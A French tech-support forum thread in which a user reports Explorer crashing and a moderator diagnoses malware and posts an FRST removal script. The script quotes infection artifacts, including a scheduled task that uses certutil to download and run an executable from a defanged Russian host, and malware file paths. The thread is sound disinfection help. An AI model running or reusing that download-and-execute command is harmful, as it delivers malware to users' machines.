Explorer.exe se plante : rapport FRST

Rymel -  
Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   -
Bonjour,



Configuration: Windows / Chrome 79.0.3945.88

Depuis deux jours, après quelques minutes du démarrage de mon ordinateur, explorer se plante, je le relance grâce au gestionnaire des tâches à chaque fois. J'ai scanné ma machine à l'aide de FRST et voici les trois liens:
https://pjjoint.malekal.com/files.php?id=20200108_h13k11w9y7r11
https://pjjoint.malekal.com/files.php?id=FRST_20200108_s10c6z14j14m12
https://pjjoint.malekal.com/files.php?id=20200108_8x6q15n9t10


Je vous remercie par avance.

Rymel
A voir également:

4 réponses

jfmimi Messages postés 13736 Date d'inscription   Statut Contributeur Dernière intervention   1 920
 
Bonjours
avez vous essayer de faire un " sfc /scannow " en ligne de commande ?
"Pourcentage de mémoire utilisée: 88% " =pas bon memoire saturer.
0
Rymel
 
Non non je n'ai pas lancé de "sfc/scannow"
et pour la mémoire, c'est un nouveau pc, il ne contient que quelques documents et photos, ni films ni vidéos
0
jfmimi Messages postés 13736 Date d'inscription   Statut Contributeur Dernière intervention   1 920 > Rymel
 
faite un sfc /scannow et si pas mieux faite marcher la garantie
retour SAV
et pas normale 88% de ram utiliser !!!
0
Rymel
 
je viens d'effectuer le sfc /scannow et voici les résultats:

La protection de windows a trouvé des fichiers endommagés, mais n'a pas réussi à tous les réparer. Des détails sont inclus dans le journal CBS.log windir\logs\CBS.log. Par exemple C/\windows\Logs\CBS\CBS.log

Les modifications consécutives à la réparation des fichiers système prendront effet après le prochain redémarrage.
0
jfmimi Messages postés 13736 Date d'inscription   Statut Contributeur Dernière intervention   1 920
 
explorer ce plante toujours ??
0
Utilisateur anonyme
 
Bonjour,
Tenter une restauration système antérieure à 2 jours (avant le problème).
Ou essayer de démarrer en mode sans échec et tester...
0
Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 685
 
Salut,

Alors...
Tu as l'air d'avoir réinstallé Windows 7 et il n'est pas à jour (Pas de service Pack 1).
En plus, c'est une version anglaise.
Ca sent un peu la version tombée de camion.

Et il y a des malwares.
On peut désinfecter, mais sinon faudrait remettre un Windows correct.
C'est voulu cette version ?
Tu as essayé de faire quoi ?


~~

Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.

Start:
CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-1608363478-4015215132-2699116129-1000\...\Run: [CloudNet] => C:\Users\ALL-TECH\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2020-01-08] (EpicNet Inc.) [Fichier non signé] <==== ATTENTION
C:\Program Files (x86)\baidu
Task: {DCD06203-B7D1-4862-8B8E-04B7A74F1A46} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [4027392 2020-01-07] () [Fichier non signé] <==== ATTENTION
Task: {DFCA423A-8734-4E86-96FD-A8E93AED4329} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://imaginemix.ru/app/app.exe C:\Users\ALL-TECH\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\ALL-TECH\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
R2 SparkSvc; C:\Program Files (x86)\baidu\Spark\sparkservice.exe [96784 2018-02-23] (Baidu Online Network Technology (Beijing) Co.,Ltd. -> Baidu Inc.)
S3 SparkUpdater; C:\Program Files (x86)\Baidu\SparkUpdate\Sparkupdate.exe [1628352 2014-05-07] (Baidu Online Network Technology (Beijing)Co., Ltd -> Baidu.com, Inc.) [Fichier non signé]
R2 TheCalendarService; C:\Program Files (x86)\CalendarTool\2.0.0.1000176\CalendarServ.exe [151696 2017-08-20] (ShenZhen Qianhailewang Technology Co,.Ltd -> )
R2 WinDefender; C:\Windows\windefender.exe [2079744 2020-01-07] () [Fichier non signé]
R2 postgresql-x64-9.5; "C:\Program Files\PostgreSQL\9.5\bin\pg_ctl.exe" runservice -N "postgresql-x64-9.5" -D "C:\Program Files\PostgreSQL\9.5\data" -w
R2 postgresql-x64-9.6; "C:\Program Files\PostgreSQL\9.6\bin\pg_ctl.exe" runservice -N "postgresql-x64-9.6" -D "C:\Program Files\PostgreSQL\9.6\data" -w
2020-01-07 10:28 - 2020-01-08 10:47 - 000003506 _____ C:\Windows\system32\Tasks\ScheduledUpdate
2020-01-07 10:28 - 2020-01-08 10:47 - 000003196 _____ C:\Windows\system32\Tasks\csrss
2020-01-07 10:28 - 2020-01-07 10:28 - 002079744 ____H C:\Windows\windefender.exe
2020-01-07 10:28 - 2020-01-07 10:28 - 000000000 ___HD C:\Windows\rss
2020-01-06 11:11 - 2020-01-08 10:48 - 003514368 ____S C:\Windows\tasksche.exe
2020-01-06 11:11 - 2020-01-07 14:47 - 003514368 ____S C:\Windows\qeriuwjhrf
2020-01-06 11:11 - 2020-01-06 11:11 - 003723264 ____S C:\Windows\mssecsvc.exe
EmptyTemp:
RemoveProxy:
Hosts:
Reboot:
End:


Enregistre le contenu par le menu fichier puis enregistrer.

Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.


2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :

3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite

4°)
Vois ce que cela donne et si des améliorations ont eu lieu.
Si ce n'est pas le cas, si tu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.
Refais un scan FRST et donne les nouveaux rapports via pjjoint.

4)
Refais un scan FRST et donne les nouveaux rapports via pjjoint



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